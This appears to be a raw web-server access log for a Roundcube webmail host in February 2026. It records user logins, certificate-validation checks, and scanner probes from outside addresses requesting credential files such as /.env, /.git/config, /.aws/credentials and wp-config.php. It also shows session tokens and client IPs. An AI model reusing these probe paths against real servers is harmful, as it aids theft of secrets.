[Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[16/Feb/2026:01:45:41 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_token=IktskDMjsw0ufl1euM3KfGcvW2WKxLPW" [Client 222.117.41.51] [Length 11621] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[16/Feb/2026:01:45:41 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=getunread&_page=1&_remote=1&_unlock=0&_=1771206341447" [Client 222.117.41.51] [Length 370] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[16/Feb/2026:01:45:41 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=list&_refresh=1&_layout=widescreen&_mbox=INBOX&_page=&_remote=1&_unlock=loading1771206341494&_=1771206341446" [Client 222.117.41.51] [Length 3780] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[16/Feb/2026:01:45:45 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=13841&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 7770] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[16/Feb/2026:01:45:45 +0000] - 204 204 - GET https mail.hanmocnn.co.kr "/rc/?_task=addressbook&_action=photo&_email=security%40facebookmail.com&_error=1&_bgcolor=transparent" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[16/Feb/2026:01:45:51 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_framed=1&_caps=&_uid=13841&_mbox=INBOX&_safe=1&_action=preview" [Client 222.117.41.51] [Length 8403] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[16/Feb/2026:02:13:04 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/169231832519748" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[16/Feb/2026:02:17:19 +0000] - - 301 - GET https mail.hanmocnn.co.kr "/" [Client 195.178.110.132] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:17:19 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 195.178.110.132] [Length 2271] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr" -[16/Feb/2026:02:17:20 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env" [Client 195.178.110.132] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[16/Feb/2026:02:17:21 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.bak" [Client 195.178.110.132] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:17:21 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.save" [Client 195.178.110.132] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:17:21 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.backup" [Client 195.178.110.132] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[16/Feb/2026:02:17:21 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/backend/.env" [Client 195.178.110.132] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[16/Feb/2026:02:17:21 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/admin/.env" [Client 195.178.110.132] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:17:22 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.git/config" [Client 195.178.110.132] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[16/Feb/2026:02:17:22 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/wp-config.php" [Client 195.178.110.132] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[16/Feb/2026:02:17:23 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/_debugbar/" [Client 195.178.110.132] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:17:23 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/debugbar/" [Client 195.178.110.132] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:17:23 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/debug/" [Client 195.178.110.132] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:17:23 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/phpinfo.php" [Client 195.178.110.132] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:17:24 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/info.php" [Client 195.178.110.132] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[16/Feb/2026:02:17:24 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/test.php" [Client 195.178.110.132] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:17:24 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.aws/credentials" [Client 195.178.110.132] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[16/Feb/2026:02:17:24 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.aws/config" [Client 195.178.110.132] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:17:25 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/aws-credentials" [Client 195.178.110.132] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[16/Feb/2026:02:17:25 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/aws.json" [Client 195.178.110.132] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:17:25 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.s3cfg" [Client 195.178.110.132] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:17:25 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.git/HEAD" [Client 195.178.110.132] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:17:25 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.git/config" [Client 195.178.110.132] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:03:02:26 +0000] - - 301 - GET http mail.hanmocnn.co.kr "/" [Client 143.198.122.17] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" -[16/Feb/2026:03:02:27 +0000] - 200 200 - GET http mail.hanmocnn.co.kr "/rc/" [Client 143.198.122.17] [Length 2273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" -[16/Feb/2026:03:02:28 +0000] - - 301 - GET https mail.hanmocnn.co.kr "/" [Client 143.198.122.17] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" -[16/Feb/2026:03:02:34 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 143.198.122.17] [Length 2272] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" -[16/Feb/2026:03:13:28 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/126141764620678" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[16/Feb/2026:03:58:01 +0000] - - 301 - GET https mail.hanmocnn.co.kr "/" [Client 54.162.53.4] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" "-" -[16/Feb/2026:03:58:02 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 54.162.53.4] [Length 2276] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" "https://mail.hanmocnn.co.kr" -[16/Feb/2026:04:13:54 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/72302304222869" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[16/Feb/2026:05:14:20 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/18339859020446" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[16/Feb/2026:05:43:03 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 222.117.41.51] [Length 2553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:05:43:08 +0000] - 302 302 - POST https mail.hanmocnn.co.kr "/rc/?_task=login" [Client 222.117.41.51] [Length 5] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[16/Feb/2026:05:43:09 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_token=arAp1TfWXvcwJ1rUTLHCs4quDtjHW2f8" [Client 222.117.41.51] [Length 11620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[16/Feb/2026:05:43:09 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=getunread&_page=1&_remote=1&_unlock=0&_=1771220589645" [Client 222.117.41.51] [Length 370] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[16/Feb/2026:05:43:09 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=list&_refresh=1&_layout=widescreen&_mbox=INBOX&_page=&_remote=1&_unlock=loading1771220589707&_=1771220589644" [Client 222.117.41.51] [Length 3780] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[16/Feb/2026:06:14:46 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/261441212623557" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[16/Feb/2026:07:15:17 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/5958188332036" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[16/Feb/2026:07:44:39 +0000] - - 301 - GET http mail.hanmocnn.co.kr "/" [Client 209.38.111.142] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" -[16/Feb/2026:07:44:40 +0000] - 200 200 - GET http mail.hanmocnn.co.kr "/rc/" [Client 209.38.111.142] [Length 2273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" -[16/Feb/2026:07:44:41 +0000] - - 301 - GET https mail.hanmocnn.co.kr "/" [Client 209.38.111.142] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" -[16/Feb/2026:07:44:48 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 209.38.111.142] [Length 2272] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" -[16/Feb/2026:08:15:40 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/318691426327419" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[16/Feb/2026:08:23:56 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.git/config" [Client 45.148.10.238] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/33.0.1750.152 Chrome/33.0.1750.152 Safari/537.36" "-" -[16/Feb/2026:08:31:54 +0000] - - 301 - GET http mail.hanmocnn.co.kr "/" [Client 16.144.17.106] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 OPR/62.0.3331.101" "-" -[16/Feb/2026:09:03:36 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.git/config" [Client 216.81.248.168] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2876.0 Safari/537.36" "-" -[16/Feb/2026:09:16:03 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/222152590129298" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[16/Feb/2026:10:16:28 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/168402213416258" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[16/Feb/2026:10:40:18 +0000] - - 301 - HEAD http mail.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[16/Feb/2026:10:40:18 +0000] - - 301 - HEAD http mail.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[16/Feb/2026:10:40:18 +0000] - 200 200 - HEAD http mail.hanmocnn.co.kr "/rc/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "http://mail.hanmocnn.co.kr" -[16/Feb/2026:10:40:18 +0000] - 200 200 - HEAD http mail.hanmocnn.co.kr "/rc/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "http://mail.hanmocnn.co.kr" -[16/Feb/2026:10:40:19 +0000] - - 301 - GET http mail.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[16/Feb/2026:10:40:19 +0000] - - 301 - GET http mail.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[16/Feb/2026:10:40:20 +0000] - 200 200 - GET http mail.hanmocnn.co.kr "/rc/" [Client 176.65.148.161] [Length 5345] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "http://mail.hanmocnn.co.kr" -[16/Feb/2026:10:40:20 +0000] - 200 200 - GET http mail.hanmocnn.co.kr "/rc/" [Client 176.65.148.161] [Length 5345] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "http://mail.hanmocnn.co.kr" -[16/Feb/2026:10:40:22 +0000] - 404 404 - HEAD http mail.hanmocnn.co.kr "/_next" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[16/Feb/2026:10:40:22 +0000] - 404 404 - HEAD http mail.hanmocnn.co.kr "/_next" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[16/Feb/2026:10:44:13 +0000] - - 301 - HEAD http mail.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[16/Feb/2026:10:44:14 +0000] - 200 200 - HEAD http mail.hanmocnn.co.kr "/rc/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "http://mail.hanmocnn.co.kr" -[16/Feb/2026:10:44:15 +0000] - - 301 - GET http mail.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[16/Feb/2026:10:44:15 +0000] - 200 200 - GET http mail.hanmocnn.co.kr "/rc/" [Client 176.65.148.161] [Length 5345] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "http://mail.hanmocnn.co.kr" -[16/Feb/2026:10:44:18 +0000] - 404 404 - HEAD http mail.hanmocnn.co.kr "/_next" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[16/Feb/2026:11:16:53 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/1911311937756" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[16/Feb/2026:12:00:59 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 211.234.204.1] [Length 2553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[16/Feb/2026:12:17:18 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/25170994713170" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[16/Feb/2026:13:17:42 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/2380247415728" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[16/Feb/2026:14:18:09 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/21241406018869" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[16/Feb/2026:15:18:31 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/4942946414564" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[16/Feb/2026:16:18:54 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/211402764230849" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[16/Feb/2026:17:19:17 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/3295913714323" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[16/Feb/2026:18:19:41 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/171872423417227" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[16/Feb/2026:19:20:07 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/206392922531069" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[16/Feb/2026:20:20:34 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/11464694730725" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[16/Feb/2026:21:20:56 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/215274441677" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[16/Feb/2026:21:32:07 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env" [Client 2.57.122.173] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" "-" -[16/Feb/2026:22:19:28 +0000] - - 301 - POST https mail.hanmocnn.co.kr "/" [Client 85.11.167.25] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr" -[16/Feb/2026:22:19:30 +0000] - - 301 - POST https mail.hanmocnn.co.kr "/" [Client 85.11.167.25] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr" -[16/Feb/2026:22:21:24 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/17897272979361" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[16/Feb/2026:23:13:05 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.git/config" [Client 45.148.10.238] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36" "-" -[16/Feb/2026:23:21:49 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/20678166812577" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[17/Feb/2026:00:22:12 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/76192759520205" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[17/Feb/2026:01:22:35 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/138904984342" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[17/Feb/2026:02:23:01 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/3760852418392" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[17/Feb/2026:02:25:10 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/.git/HEAD" [Client 192.41.114.224] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0" "-" -[17/Feb/2026:02:25:14 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/.aws/credentials" [Client 79.17.16.83] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0" "-" -[17/Feb/2026:02:25:15 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/.env" [Client 222.157.70.117] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1" "-" -[17/Feb/2026:02:25:17 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/.svn/wc.db" [Client 197.63.181.91] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 